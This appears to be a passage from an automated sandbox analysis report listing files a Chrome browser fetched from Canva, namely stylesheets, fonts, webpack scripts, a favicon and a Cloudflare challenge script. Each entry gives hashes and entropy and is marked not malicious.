                                                                                                                                                                                                                                                    Preview:wOF2.............................................D..:....`..n...........4..r..>..6.$..:. ..s..{..K[.....~.!..]U.?....:..I..,7.s.....+..Y...........{......{..ij.5...6...b.\../j..i..e&Z..;..p.cDHCJq.,.S.!.TO1...d0`^.+.Z..-..n..z.q'6p.h....iNArV.H..Y..y.s.......ag"<.Ax......Z..9.@...}.._....ucA.....%L........JJ>...^.....rF.a.....Z.I..v..{..;d-.e?....)...)LR...TI....q./e.G.X.'....b8@.m.Ur..,...G}...^;.E..f.=U...."..L..K\..19...C.Q)..C.jS.W......D.N..^.1#L.........D.....b......p...!rsy...@..km.F3L_...h#$B..B.(...O..dM.."...O.5.h....b@......z...z0..H.!$...$.T...Q...Z..M..<.?........""*&*..........Mk...w5..v./.....l...a.[......B.m...O..J.......~(.....L`*0....U...<...|......._.@.k`...E........Q...8..(..`n.....k>H...T.<......A.."^..xn.3oV...=.._v.:..;>4..w&D.L.M...\J..@...._.B.P..u.x>........0..x...jK.....6.}..(k....%ZR`I.....C.?F.G.8..*.....$....K..o.w.B..-..8.z..UU-HU..0.6. ....I..Gv...5......7pb........7c.z.$...B..Fv...RR..Hw..
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1732)
                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                    Size (bytes):1795
                                                                                                                                                                                                                                                    Entropy (8bit):5.492066409692847
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:5i+XiuCWf0+fIANCWaqQvU+RUZMXb1LBULlhlYlPLlbMXzUEwUPD53D8UZqpMjzs:vb0DnqQ1b1YPlYlj2lp5f7S1
                                                                                                                                                                                                                                                    MD5:586E9DEA59811305119F635AD458A7D8
                                                                                                                                                                                                                                                    SHA1:C73FE31E4C235F33FF75404806A560E681016640
                                                                                                                                                                                                                                                    SHA-256:FB066E78F4742D0E8C2D29310C3F3B86F54A399B080D23CF3F7CBBB745DACCE1
                                                                                                                                                                                                                                                    SHA-512:957391CEBD8EDA165DA4143471C88BCB041F17AF81BBEEA98990EBBE8E2BECD2A086BE0912DF39D3D376A38AF47A555984D2FFBD930FD391C31A00469945AC50
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    URL:https://static.canva.com/web/42edacda53f68fee.ltr.css
                                                                                                                                                                                                                                                    Preview:.MbkImg{left:0;margin:0 auto;max-width:480px;position:fixed;right:0;text-align:center;top:0;width:-webkit-fit-content;width:-moz-fit-content;width:fit-content}.MbkImg.RDTSdw{top:var(--safe-area-inset-top)}.ncH3wQ{background-color:var(--4RaSjg);border-radius:12px;box-shadow:var(--ej6pBg);box-sizing:border-box;color:var(--VNXpSw);display:inline-flex;margin-top:16px;max-width:480px;min-height:48px;padding:8px;text-align:start;width:-webkit-fit-content;width:-moz-fit-content;width:fit-content}.ncH3wQ.anbz7g{padding:0}.ncH3wQ._5sEdEQ{align-items:center;flex-wrap:wrap;justify-content:flex-end}.ncH3wQ.asO08A{border-radius:12px}.ncH3wQ.asO08A.anbz7g,.vkX3IA{padding:8px}.vkX3IA{align-items:center;display:flex;flex:auto;margin-top:1px}.ncH3wQ>.vkX3IA{padding:0 16px}.ncH3wQ.anbz7g>.vkX3IA{padding:0 24px 0 8px}.ncH3wQ.asO08A>.vkX3IA{padding:0 8px}.ncH3wQ.anbz7g._5sEdEQ>.vkX3IA{padding:0 16px 0 8px}.ncH3wQ.anbz7g.asO08A>.vkX3IA{align-items:flex-start}.ncH3wQ.asO08A._5sEdEQ>.vkX3IA{padding:0 16px 0
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (8795), with no line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):8795
                                                                                                                                                                                                                                                    Entropy (8bit):5.743297698083714
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:zYgq54UmlhGb2l+6vkAzivcRe1geLapnNGswOjlFlqrT/IRH:hOdb+VXzYKsLapnwBOtqf/IRH
                                                                                                                                                                                                                                                    MD5:5A668CC1D1C01313D864E7ED5D25899B
                                                                                                                                                                                                                                                    SHA1:8A63B77C269C6706E9FF4D47F17CA5D3C7BDFEE1
                                                                                                                                                                                                                                                    SHA-256:6A9F8943A711153FB5E89E154307BEF13C1038727F5A94A077BC8AD2BC131B55
                                                                                                                                                                                                                                                    SHA-512:DB4C4BCC2E6A608AD2B9A7D700FA164BA24E4B02AFD53D9F6A06B85E8BA6203C904E1B6C083580F0CB564511FCCD20C9AC7893D1312DEFE1472E30F6E0A84AC6
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Preview:window._cf_chl_opt={cFPWv:'b'};~function(W,h,i,j,k,o,s,B){W=b,function(d,e,V,f,g){for(V=b,f=d();!![];)try{if(g=parseInt(V(445))/1*(-parseInt(V(429))/2)+-parseInt(V(423))/3*(parseInt(V(392))/4)+-parseInt(V(457))/5+parseInt(V(401))/6+-parseInt(V(404))/7*(parseInt(V(422))/8)+-parseInt(V(452))/9+-parseInt(V(464))/10*(-parseInt(V(444))/11),g===e)break;else f.push(f.shift())}catch(E){f.push(f.shift())}}(a,617814),h=this||self,i=h[W(411)],j={},j[W(455)]='o',j[W(450)]='s',j[W(442)]='u',j[W(504)]='z',j[W(388)]='n',j[W(500)]='I',j[W(490)]='b',k=j,h[W(499)]=function(g,E,F,G,a1,I,J,K,L,M,N){if(a1=W,null===E||E===void 0)return G;for(I=n(E),g[a1(492)][a1(489)]&&(I=I[a1(410)](g[a1(492)][a1(489)](E))),I=g[a1(398)][a1(421)]&&g[a1(449)]?g[a1(398)][a1(421)](new g[(a1(449))](I)):function(O,a2,P){for(a2=a1,O[a2(385)](),P=0;P<O[a2(416)];O[P+1]===O[P]?O[a2(501)](P+1,1):P+=1);return O}(I),J='nAsAaAb'.split('A'),J=J[a1(446)][a1(386)](J),K=0;K<I[a1(416)];L=I[K],M=m(g,E,L),J(M)?(N='s'===M&&!g[a1(393)](E[L]),a1(4
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (2891)
                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                    Size (bytes):2954
                                                                                                                                                                                                                                                    Entropy (8bit):5.393469836161031
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:+yKJPBfm0CzUE7U4KIUYpl6NX8rJaNOQj+117KNXMNOcvx+yp9pN+9w0r:+yWPhCpjvpl6NMrJaNOiN8NOcv4ynpN+
                                                                                                                                                                                                                                                    MD5:AC85BB6E45ED53967AA8E75EF43F1155
                                                                                                                                                                                                                                                    SHA1:178E9C905B9A36D1B184023C8D58ACB95D6A4029
                                                                                                                                                                                                                                                    SHA-256:9C8C485E8EE3C40D9E04F23F77C1D0D2880378E97FFBE1AD290898D254AC6E4F
                                                                                                                                                                                                                                                    SHA-512:B8204DF4005FA40724BF6457FD71635789C95F13FCE0C1CC8F5C0B460AAEAC0960D7E5F15055C2B0D3F4A16AFE46D22FA8C57FAF9501C42A52197EBE339DFFB0
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    URL:https://static.canva.com/web/4e14dd1571e90f68.ltr.css
                                                                                                                                                                                                                                                    Preview:.nMvVqA{display:grid;grid-template-areas:"corner-block horizontal-headers" "vertical-headers sheet";grid-template-columns:auto 1fr;grid-template-rows:auto 1fr;position:relative}.nMvVqA.H2wykw{direction:ltr}.nMvVqA.UweldA{direction:rtl}.rsTRSA{background:#fff;grid-area:corner-block;position:sticky;top:0}.rsTRSA.H2wykw{left:0}.rsTRSA.UweldA{right:0}._32sKQw{grid-area:horizontal-headers;top:0}._32sKQw,.xdIsTQ{background:#fff;position:sticky}.xdIsTQ{grid-area:vertical-headers}.xdIsTQ.H2wykw{left:0}.xdIsTQ.UweldA{right:0}.Gdl7fQ,._0YOFPg{grid-area:sheet}.Gdl7fQ{height:100%;pointer-events:none;position:absolute;top:0;width:100%}.Gdl7fQ.H2wykw{left:0}.Gdl7fQ.UweldA{right:0}.aX8dhQ{background:rgba(57,76,96,.15);position:absolute}.aX8dhQ.VGcLng{left:0}.aX8dhQ.gl1RPg{top:0}.xhBZaw{display:flex}.xhBZaw.jNbTIg{direction:ltr}.xhBZaw.gtA7Dw{direction:rtl}.Vt2_4w{display:flex;pointer-events:all}.Vt2_4w.jNbTIg{direction:ltr}.Vt2_4w.gtA7Dw{direction:rtl}.An9VeA{display:flex;flex-direction:column}._93ro
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:Web Open Font Format (Version 2), TrueType, length 194188, version 1.15139
                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                    Size (bytes):194188
                                                                                                                                                                                                                                                    Entropy (8bit):7.998710925174692
                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                    SSDEEP:3072:2DB+LuV+P1oE5jssrK+hXI4LLYJwGDU5yFCmoBV+pFtUDLXyKcTkI6ocSJ5mmD0Q:2FsuVnds+iXI4XYiB7BgULXTcT1WSJ5H
                                                                                                                                                                                                                                                    MD5:654BA7FA32CCFD8C24E11F29B7156A34
                                                                                                                                                                                                                                                    SHA1:E793CFC8775A34158F6C2E2B9B4F8AA9DD3B42D4
                                                                                                                                                                                                                                                    SHA-256:C2D36A5DB423D0A4A5D3A8E16E65B1E5384E476CAD41C41D3E3AF2622CDA5813
                                                                                                                                                                                                                                                    SHA-512:77F1F87EE469D7786865A7224BC026E8EAF2DD5BA6D6BF6EB9716D68F80F2A0AD4D8961FCA25DFD6C5797CD37F33FDEF3E3162A99154AA9E5B103FCAC6CA7057
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    URL:https://font-public.canva.com/YACgEZ1cb1Q/0/Arimo.7ac02a544211773d9636e056e9da6c35.7.f8f199f09526f79e87644ed227e0f651.woff2
                                                                                                                                                                                                                                                    Preview:wOF2......................;#......................v...&..J....`...........4........(.6.$..\..Z..d. ..o...u..C[d........)..B..l.G.%t2.A.@.!U.}..D.J.3.Ae.*.....c..l0..^.u$.C.'.*.].[..Z.................%...U...=;....@.F...GB`0..z.(~b.I...=.5F\..Y.8.9.j.Z.Q-.M.b~...-........../.......rB.0...+..#.Ev..O......C.#........0......Z.i..uN'd.EyB".&$E...........8..W..w.$j9...;.qK[KD..jGa..{.......*P..A...)...`~..7.#$px.'T.cA...q..P%=.}c.'7.....=.c.<upU.\.SUn..p....a72....N.....q7^..a.+.'....\.._.I\...$<..\...vOX.ra.B2..E.b...x.M5.H.i%.)~.v...U.CN..I.L.....~c.|.rw.....5.d.....2a,........}.....f..u...l.;..\..'..|...q..5.+.V)f..[Z.2.u....lO.N<..F7.<.@..}D.A..+)....".}.f1.gmK.+q.h..v.<..eYY...o6[...Gt...'...!3...}(.J...|;!..Ad.'./.*..+...BO...w....p.)./W4.c....q..Z..#c../..4.......1..P.#..B...N...L\lk.[.Y.N6.../.o.n......Y...Q..r.|....W=....E..]....F.....zS...LaB...3.T..h&..&.m[]D..'|.g...|.{.eYv...1/....6.,#q.k.J...H\...DA..R.D.bL.I..7X.F.....c.!.LO,.g.
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (6739)
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7061
                                                                                                                                                                                                                                                    Entropy (8bit):5.15754941607153
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:bI9hhT9vVVxHdR8JLXsgtcchFWHf9l5Hk9vIv8PTw:bwhXvzxHIXsJcC/vlevI+s
                                                                                                                                                                                                                                                    MD5:7D0DBD3E6B5398F851084B652D4490B1
                                                                                                                                                                                                                                                    SHA1:EEE3CB406BA40C91E004125A1E51D122F1D01805
                                                                                                                                                                                                                                                    SHA-256:CCF9C1674CA9DFF09526A7C6D82AB220028FA011EBFD9132859491C4C7556D4E
                                                                                                                                                                                                                                                    SHA-512:120722EA8FE03782A1610F4FC0402498E2BA44EB19C5592AD85B9866D89712FFED8F2E25A83D6C6E70AD81BABFD715E2B510D64D5BE7505862491BA831A79E27
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Preview:(function() {. const messages = JSON.parse("{\"in7gzw\":\".{0} . {1}\",\"TNekNA\":\"Engineering\",\"yTCqEQ\":\"Absolute value. Removes minus signs from negative numbers.\",\"YAYu0Q\":\"Returns TRUE if any argument is TRUE.\",\"LE4MeQ\":\"Esc\",\"R+x2Sw\":\"return-column\",\"M50kBA\":\"Previous\",\"8MC7NQ\":\"Counts the cells with any data.\",\"ETcy/w\":\"Video not found\",\"yLWiZA\":\"Ctrl\",\"pjl2iw\":\"Sorry, we couldn.t load this chart.\",\"MzOrJg\":\"year\",\"ZmfiBA\":\"...texts\",\"MvkKiw\":\"Finds the largest value.\",\"trinwg\":\"Previous\",\"W5NwSg\":\"Zoom out\",\"xWzt7A\":\"Show captions\",\"7JFBKQ\":\"date\",\"C0VHsg\":\"The formula contains an invalid number\",\"XoXDGA\":\"Try again.\",\"27G5yg\":\"Pause\",\"VdIrCw\":\"Rounds the number to the specified number of decimal places.\",\"9ND0kg\":\"The formula refers to a cell that.s not valid\",\"hMw7aQ\":\"Counts the number of empty cells in a specified range.\",\"ibdecg\":\"Numbers can.t be divided by zero\",\"P2CRh
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                    Size (bytes):4414
                                                                                                                                                                                                                                                    Entropy (8bit):5.9195472440471955
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:v6LQztmnE2hqFJmd7l0TlPInbSqVpWV9gr9Fb3+:bs4oCTlGbSqVpWXw9p
                                                                                                                                                                                                                                                    MD5:A0C86DA7FC37EA50E848C4733761D53E
                                                                                                                                                                                                                                                    SHA1:7B53A4FE8198AA654C02282134DCC19E0C07CC9A
                                                                                                                                                                                                                                                    SHA-256:EC2FBAD47E598FE06C7A2B825224B3B1B8D8221F3002E6370E627D459FF0634A
                                                                                                                                                                                                                                                    SHA-512:6FD3BB6D1392F89DCF63A37A9086517620A63C6D933885ACDB61F99BB8AF137D2DD184C59EF92C173E214711DCEAE9585A5B574AFB422A4A0969D99C86264339
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    URL:https://static.canva.com/static/images/favicon-1.ico
                                                                                                                                                                                                                                                    Preview:...... .... .(.......(... ...@..... ......................................................@...........#h..!g\."h..!i..#k..$l..$n..$o..%q..%r..'s[.#t..........@...................................................UU..........,]).+_..)b..*j..)l..'l..%l..$k..#m..$q..&u..(y..(z..&t..&u..%v)..........U......................................@@..........3Y..1[..4b..1]..0\..0^../`..,c..+f..)i..&l..%o..%q..&s..&t..)|..'v..(v..........@...............................33......8X .7V..;]..7V..8W..7W..7X..8Z..=_..?b..?e..<g..5g..-i..*m..(q..&s..&t..'u..*...(x..(x .....3f......................@@......CN..?R..@W..=R..=R..>S..?S..GZ..<S...?...5...6...@..!T..?f..;i..0j..-o..)s..'u..'w..*}..(y..'z......@...............UU......PP .HL..IO..EN..DO..CN..GQ..GQ...!..HR................ly...B...O..Dh..7g..3l...q..)v..(w..)|..)z..(x ......U..................SG..UK..PG..NI..LI..NN..FF..76..................................|....>..He..=e..8i..3o..-t..*w..+...){..............@......\A..cG..ZB..XC..VD..VG..QC..OA...
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (2156)
                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                    Size (bytes):17275
                                                                                                                                                                                                                                                    Entropy (8bit):5.434407663185445
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:384:mnJVAX2+03OhWO1L1Bn4ad1ju+2gnRnK+NWVmMNEDBTG6GiAjqWXHQuI2qP32a:m8G+03OhWO1L1yad1ju+3RnDNWVBNEFz
                                                                                                                                                                                                                                                    MD5:D413EBCA508B7B61807EE983A30203D3
                                                                                                                                                                                                                                                    SHA1:EAEBEDD510A1574670108F01A92FC908406623D9
                                                                                                                                                                                                                                                    SHA-256:EE9760E600529C567D7C570542EB631833AE7F07D1A6D713F7B94CB8DB788345
                                                                                                                                                                                                                                                    SHA-512:F05999BBC94B80744E78BD7A45970CEB0F5C2CF15CD900899912627E63345933D999972787A354033079648B450485319FB762FE9DDDEBBF43099B31BFFCD699
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    URL:https://static.canva.com/web/0cda863f2baa0d46.js
                                                                                                                                                                                                                                                    Preview:(self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[2395],{../***/ 284457:.function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);__web_req__(577033);__web_req__(153325);self._fe4d99ebe0d2d259646a80d250150d47 = self._fe4d99ebe0d2d259646a80d250150d47 || {};(function(__c) {var S=__c.S;var T=__c.T;var G=__c.G;.var wdb=function(a,b,c){return async(d,e,f)=>{let g,h={};Array.isArray(e)?g=e:h=__c.Sd(e);null==g&&null!=f&&(g=f);return __c.ae(a,b,d,h,()=>c(...g))}},Adb=async function(a,b){const c=__c.Ee(__c.Ce([xdb,"create"])),[d,{Rsa:e}]=await Promise.all([a.Ol.post(c,ydb.Pa(b),{yn:"recordanalyticsevent"}),__webpack_require__.me(577033).then(()=>({Rsa:zdb}))]);return e.Ra(d)},Ddb=async function(a,b){const c=__c.Ee(__c.Ce([xdb,"createBatch"])),[d,{Qsa:e}]=await Promise.all([a.Ol.post(c,Bdb.Pa(b),{yn:"recordanalyticseventbatch"}),.__webpack_require__.me(577033).then(()=>({Qsa:Cdb}
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (2139)
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):44810
                                                                                                                                                                                                                                                    Entropy (8bit):5.511402953964193
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:768:CEhAiTH6cmfcljC7OWOtrk4MtLQbK5PPrAMFi+ugkoJ2TyDTLDrjynIPGV3pULtu:+iTH3+wNrRMtLQbuPPrAMFingkoJLtHO
                                                                                                                                                                                                                                                    MD5:99252E478B7202700B285066EE7024CC
                                                                                                                                                                                                                                                    SHA1:3BA071E13110A035C8327095A682980E39D9B465
                                                                                                                                                                                                                                                    SHA-256:34566AFB6B84A2E67505C71CDA39DE74E6E844E927BCE558302CEA61240B577D
                                                                                                                                                                                                                                                    SHA-512:F6765B5D9F83C9D42C52606CC0EA46B90C9C142B9E123BDA927F124ACEBA7D98D69758DF5F436E8638DAABA26F8FEE101A34083E2A4273187F7073C5A13AC005
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Preview:(self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[1425],{../***/ 38406:.function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);self._fe4d99ebe0d2d259646a80d250150d47 = self._fe4d99ebe0d2d259646a80d250150d47 || {};(function(__c) {var oJ=__c.oJ;var Ac=__c.Ac;var L=__c.L;var vJ=__c.vJ;var jf=__c.jf;var A=__c.A;var We=__c.We;var B=__c.B;var Eb=__c.Eb;var Ut=__c.Ut;.var h7=function(){const [a]=(0,__c.Vb)(()=>Ut());return a},i7=function(a,b,c){if(a===b)return!0;if(a.size!==b.size)return!1;a=a[Symbol.iterator]();b=b[Symbol.iterator]();for(var d=a.next(),e=b.next();!d.done&&!e.done;){d=d.value;e=e.value;if(c?!c(d,e):d!==e)return!1;d=a.next();e=b.next()}return!0},YAb=function(a){switch(a){case 4:return Eb("9ND0kg");case 2:return Eb("ibdecg");case 7:return Eb("446quA");case 5:return Eb("j1fbqg");case 1:return Eb("O5i4AQ");case 6:return Eb("C0VHsg");case 3:return Eb("+IXmVg");.d
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:Web Open Font Format (Version 2), TrueType, length 38848, version 1.655
                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                    Size (bytes):38848
                                                                                                                                                                                                                                                    Entropy (8bit):7.993669247804477
                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                    SSDEEP:768:SGQkx5jYojomEnKWP2gtvC7smgmSNW82sdRzCGZMc0wbsNm4NY8vikf:3L5LHNY2gU7ZS2gdCCMcQG8KE
                                                                                                                                                                                                                                                    MD5:CFF149EE1E9D2BE50AC77BCD86769D05
                                                                                                                                                                                                                                                    SHA1:A1B8A95DDFE811A098D0298E83DD711E90943732
                                                                                                                                                                                                                                                    SHA-256:C84DE7E52D68BD3B651219E7085236BABC85A0C7C79F21A14F0CDDDBD0FB4B4C
                                                                                                                                                                                                                                                    SHA-512:D27E713343F51A75E909B4A01D3F2FFB95EE82E13A1B21A9D3034D3858579E4C3FEBAE76E1AF706B820E51583254281E256B825F1742167E1E072DC59CDF1AE4
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    URL:https://static.canva.com/web/images/cff149ee1e9d2be50ac77bcd86769d05.woff2
                                                                                                                                                                                                                                                    Preview:wOF2..............%(...L..............................j...?HVAR.^?MVARZ.`?STAT$'(..N/....D.|0....6.$..|..... ..>. [..q..W.....sgtY.....C.m..X=e...`...~9...?-....h[U.t.-.\..Q.zkm..,..k..RP4...%Z#_1q...H...A.P.T.s#..Q...;......[...H|..C....i....AW....V....r..'.....`...$r.C$C$..8&.....]:v\x&N..q..........}..+.Q.$OJ............./.Wdb.a..........}.<....}//..B...BHB.!.K.+.).kT#.J).".Xa,e.JqQDtW..o...R..v.W...........;]..w...........7C0.N.^Q.m.......bAn..c8b...VD..(...Q"Z..y..1...o..O_......L.._.f.&........LC.Z................N....=.Y..]...h.).|....&.1B.....6..].R..3.t)....i........#...`.B.8..D.E\V.(5*...O2..7..93.:.l6.$.B....>._...9..FE.........V.........1...0Al.5g=.....:/...L..3.b......7....... ......j...u...F)......e.g.Xf"C..e...3=..#...y...w...I.@.O.>.J.$........{S.V...e8B.. ."J9..DD."27k"VD..(...}...LHT...a.6-...r..m~.........~.?...NI...!..'F(b.....xb...(."~u...Q..&:.....9#Gm.D....D.&....R|.D..N...:...".......II'.w_#..X...&:..WQ...|...oj...RzP....T|
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:Web Open Font Format (Version 2), TrueType, length 203232, version 1.15139
                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                    Size (bytes):203232
                                                                                                                                                                                                                                                    Entropy (8bit):7.998457225528247
                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                    SSDEEP:3072:nlYBrCSeMS/Yyho1JFBxaAueqjVlPUKmLq+CS6DoJpIEYMbODMWrOdow4R:nlYBm8oYyC1LaAZAlsvRRpIEdcFr3NR
                                                                                                                                                                                                                                                    MD5:FC158C702F95747BD895CEC9EE6C5749
                                                                                                                                                                                                                                                    SHA1:2E8AB4664A87ED3735DAB1F1CA78E97796A7342D
                                                                                                                                                                                                                                                    SHA-256:A944F637083A93ABE190A1C53C2179D3DA3E3F179F3DEBE076E1BCAE375877D2
                                                                                                                                                                                                                                                    SHA-512:8A882751BCE35B582A9AE17AD92FF9420183774E38D70DB0BFFFD245CCD2306A506EA274578516C6DBC103ED0FD3E3A346A0F2304E48FB861563943DCBA1F342
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    URL:https://font-public.canva.com/YACgEZ1cb1Q/0/ArimoBoldItalic.08fb930e5cf38bab811efa91.1060345c54d396e76d73f1da7ee200bd.woff2
                                                                                                                                                                                                                                                    Preview:wOF2...............T...o..;#......................j...B..J....`...........4........(.6.$..\..J..d. ......u..0[..*C.....R..i.B...j1..`.f.;(ub...".1.b|..vH..?.W.AZ.v.#..&CK.{.G...................jC.......s.}of.].....m.}..Q..._.r.....^..Y...F...~m....X-.!.5......B...x....8bk.l?....].7....*.A..r...TA..A.....A.wq.7#...^.\.".%...1...t.xk..Q.....U....C/Z.[..........:..?...C!...`0.$..^...9..8..7.d.b.p4...&.y..?..9.[[.W.0.@AG....O....!.F.u.6y=.q9....t...B...\RD.C.._.2..e......X.Y.....MY<..@V.}.|.9o...d...IF....%.].U.|...U..{..x..DBXJx....l_.q*kH.E....).a8....#../..._..1m.]gL...{.w.)..P/..!8..k..v..-[,..V...z...I.<.....{..c.Gx@....D.!..G.xx".f.P%~..O..MvrC<....}Iz.*.U.......o......iY......@..,....%.L....c.lU..8.!l.......-^.....X..NyJk..od...?...3d........:|..$Z.|..E.........9..l..]5.:.;."~.7GI?.J...1.M?..gt.M.g.W.1..)H.#c.p.%.N..E...%.+.T..k|A...'...Sg+.z..~t.@..@b'..-VJ..ro22d.J).Z.F](#.R....o.j^i...X.5..S.x.rL.jJ...2.R.Zq..Ii.>..EwP.........
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:Web Open Font Format (Version 2), TrueType, length 42876, version 1.0
                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                    Size (bytes):42876
                                                                                                                                                                                                                                                    Entropy (8bit):7.993895596252166
                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                    SSDEEP:768:TK+/ZcRK3EIVb0HyQd9gn69p2yMHOflBcOdKlPxM/klsSEp4WCAUTl6wTi1QrJnE:eKkK3EuQd6n6bxMHO9COdWxflsbCvTDO
                                                                                                                                                                                                                                                    MD5:8F4BEC1DDF700ED07257978D5663A76D
                                                                                                                                                                                                                                                    SHA1:F620B74E20E57ACAD0A9CBC65B72C96567854587
                                                                                                                                                                                                                                                    SHA-256:24F4213242BADC483A9657E2A7BAE4639F346B140F5C2E2A8E32C731FCB47381
                                                                                                                                                                                                                                                    SHA-512:2E65284FD982D104621A8FC091C93B70D985E52CD2C607CE4E00A5F6D624A17AED63000E7F59DBB612224BE06B9CD1EA07A004675E1ADE7D1C6AA4CF26A48614
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    URL:https://font-public.canva.com/YAFdJjTk5UU/0/CanvaSans-BoldItalic12646845404018590449.625cf32ea46ae48b58ebd3ff993de469.woff2
                                                                                                                                                                                                                                                    Preview:wOF2.......|....... ..............................D.....l.`..n...........h..7..>..6.$..:. .....{..K[..q....p........s..u%#J.U..6.t<..Ft.j'Tym........K.F.m;t..x!.%3M.*.....J.%...v(E.C.....A?7.Z......).....f..B.k..^.tVy..u......./.xD.%?.~...@.5......%>G........yK.A..p.!..........v..W....u.........&J..eU-.y?ca..q.X,.(.......G.x....,..<Q.|2o...3iw.?iaA....8EW.~............m.f........:/....=y.0.Z.."....7&K......t..ff7b.R..2.*2........-h[X.....#...pr.!.|....;..:(?Z..U5U..b. ....e.d/..#.......m.4...".....+~..../G..C|7....XY...e[..{7.....s.'"A.x.....\...^.....DM..{.U.'.Fo.M......w.&5.$..-.@Dd.+'....].....j...K...u.y...c.^Vgi..^.!.r{.m..a1............{.ajY.....]..K. ...|..s.Y.t...^.. ..../......:Mr};.?2..v;e..2...M.6qH....S..5......eS....3h.n.0=N.4e.).%.....k.=..D-U...X$..e...u...cKN&..s.a....._.^/..*.;.......~...&..BO...#.1..m.?.2..dpU$.P.f....{...Z.3...@...a2L(...p.k.K..li.X.z5..X~.O.S......a.\.._....|p....WC_....Ld.Vc"R....gVaI.%deB.........
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):43
                                                                                                                                                                                                                                                    Entropy (8bit):3.0314906788435274
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:CUkwltxlHh/:P/
                                                                                                                                                                                                                                                    MD5:325472601571F31E1BF00674C368D335
                                                                                                                                                                                                                                                    SHA1:2DAEAA8B5F19F0BC209D976C02BD6ACB51B00B0A
